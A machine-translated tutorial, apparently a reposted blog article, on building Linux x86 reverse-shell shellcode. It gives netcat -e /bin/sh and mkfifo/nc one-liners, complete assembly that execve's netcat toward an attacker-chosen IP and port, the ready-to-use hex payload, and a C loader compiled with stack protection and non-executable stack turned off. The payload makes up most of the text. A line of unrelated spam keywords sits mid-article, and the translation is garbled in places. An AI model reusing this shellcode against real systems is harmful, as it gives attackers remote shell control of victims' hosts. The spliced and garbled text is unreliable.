This article is mainly about how to construct a shellcode when the remote overflow, in order to form an effective rebound link.
0x00 Reverse bind remote shell
There are many ways to establish a connection between a local host and a remote shell, most commonly by opening a port on a remote host and then
stdout/stderr/stdin
Redirect to a shell.
This allows us to connect to it via a simple netcat command on our own host.
However, in most cases this method does not work, many servers open only a small number of ports, such as HTTP (s), FTP,SMTP and so on.
Other packets are discarded directly by the firewall. The way to solve this problem is to use the rebound link, the rebound link means that the remote host to actively connect our server.
So, you need to open a port on your machine and wait for the hapless victim to connect to your host on its own.
0x01 netcat-e Command
First we assume that Netcat is installed on the target site.
Normally netcat supports the e parameter, which will run the program followed and bind it to the link.
If we /bin/sh
bind through the e parameter and turn on listening, then when we use a remote host to connect to this host, it is equivalent to acquiring a shell. Let's try it out.
Running on local host
?
Listen for links that are connected.
Open a new Shell to run
?
1 |
netcat -e /bin/sh 127.0 . 0.1 9999 |
In this way, your first shell will establish a link in which to execute ls whoami
commands such as to test if it works properly,
You can also use CTRL + C to close this link.
Note: The OpenBSD version of Netcat does not support the-e or-c parameters.
You can use the following statements instead.
?
1 |
rm -f /tmp/f; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2 >& 1 | nc -l 127.0 . 0.1 9999 > /tmp/f |
But it's too complicated to run in Shellcode.
0X02 Assembly Code
Now let's take a look at how to put this statement through the Assembly and put it into the shellcode.
Here is the assembly code that we shellcode important to run. (Intel Syntax)
?
12345678910111213141516171819202122232425262728 |
jmp
short
forward
back:
pop esi
xor eax, eax
mov
byte
[esi +
11
], al ; terminate /bin/netcat
mov
byte [esi +
14
], al ; terminate -e
mov
byte
[esi +
22
], al ; terminate /bin/sh
mov
byte
[esi +
38
], al ; terminate
127.127
.
127.127
mov
byte
[esi +
43
], al ; terminate
9999
mov
long
[esi +
44
], esi ; address of /bin/netcat in AAAA
lea ebx, [esi +
12
] ; get address of -e
mov
long
[esi +
48
], ebx ; store address of -e in BBBB
lea ebx, [esi +
15
] ; get address of /bin/sh
mov
long
[esi +
52
], ebx ; store address of /bin/sh in CCCC
lea ebx, [esi +
23
] ; get address of
127.127
.
127.127
mov
long
[esi +
56
], ebx ; store address of
127.127
.
127.127 in DDDD
lea ebx, [esi +
39
] ; get address of
9999
mov
long
[esi +
60
], ebx ; store address of
9999 in EEEE
mov
long [esi +
64
], eax ; put NULL in FFFF
mov
byte
al,
0x0b
; pass the execve syscall number as argument
mov ebx, esi
lea ecx, [esi +
44
] ; /bin/netcat -e /bin/sh etc etc
lea edx, [esi +
64
] ; NULL
int
0x80
; Run the execve syscall
forward:
call back
db
"/bin/netcat#-e#/bin/sh#127.127.127.127#9999#AAAABBBBCCCCDDDDEEEEFFFF"
|
In fact, the above code to do the translation into C language is the following two lines
?
12 |
char *command[] = { "/bin/netcat" , "-e" , "/bin/sh" , "127.127.127.127" , "9999" , NULL}; execve(command[ 0 ], command, NULL); |
The command is the following string
?
1 |
/bin/netcat#-e#/bin/sh# 127.127 . 127.127 # 9999 #AAAABBBBCCCCDDDDEEEEFFFF |
The parts of the string are #
separated because NULL is not allowed in the shellcode, which causes the shellcode to be truncated so that it cannot be
The target host is running correctly.
No matter where we run this program, the first thing we need to know is the address of the command string.
So I created two labels (ForWord and back) on lines 1th and 26th, using the call command (27 lines), first putting the return address into the stack, the return address being the address of the next instruction, and the address of the next instruction is exactly our command string.
Back in line 3rd, we pop the command string address to the ESI register, and then initialize the EAX, noting that we cannot directly use the
?
Because NULL is not allowed in Shellcode. Finally we, the command strings are stored separately into memory.
Router Setup password install win7 system tomorrow Rally stock wireless webcam WiFi router settings
In lines 5th through 9th, we move 0 of the register to the end of the string, using an alternative #
(taken from the EAX register, where 0 uses XOR generation), we need an array of individual string addresses as the second parameter of the Execve ().
In line tenth, we put /bin/netcat
the address in the AAAA location, 11 to 18 lines in the program are doing the same thing, the last 19 lines we put into the position of the FFFF, as the end of the string.
In line 20th we are ready to execute the system call, we first store the 0xb into eax, ESI (/bin/netcat address) stored in EBX, the address of the string is stored in, ECX, the last edx store null, then use 0X80 to trigger the system call, no accident, A rebound link instruction was executed successfully.
In this example, the IP address uses the 127.127.127.127 port number of 9999, which is a local IP address. Usually
You need to use an external IP to replace it, if the two IP length is different, you have to carefully modify all the assembly code associated with him.
0x03 Compiling test Shellcode
Now, we need to store the assembly code in an ASM file, which we call shell.asm, and compile it with the following statement.
?
1 |
nasm -felf32 -o shell.o shell.asm |
Use, objdump -D
command we can see the opcodes of this small program, using the following paragraph of instruction we can put them
Put into a C string
?
1 |
for i in $(objdump -d shell.o -M intel |grep "^ " |cut -f2); do echo -n ‘\x‘ $i; done;echo |
Finally we get
?
1 |
\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x39\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46 |
Finally, we use a C program to verify that the shell is viable.
?
1234567 |
char shellcode[] =
"\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x39\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46"
;
int main()
{
int (*ret)() = (
int
(*)())shellcode;
ret();
}
|
To compile it, you need to turn off some secure compilation options and then use the following command.
?
1 |
gcc shellcode.c -fno-stack-protector -z execstack -o shellcode |
Run in another shell netcat -lvp 9999
and run the C program ./shellcode
if everything is right, you can get a rebound link shell.
en:http://blog.csdn.net/wgwgnihao/article/details/45933359
Cn:http://www.2cto.com/article/201404/292131.html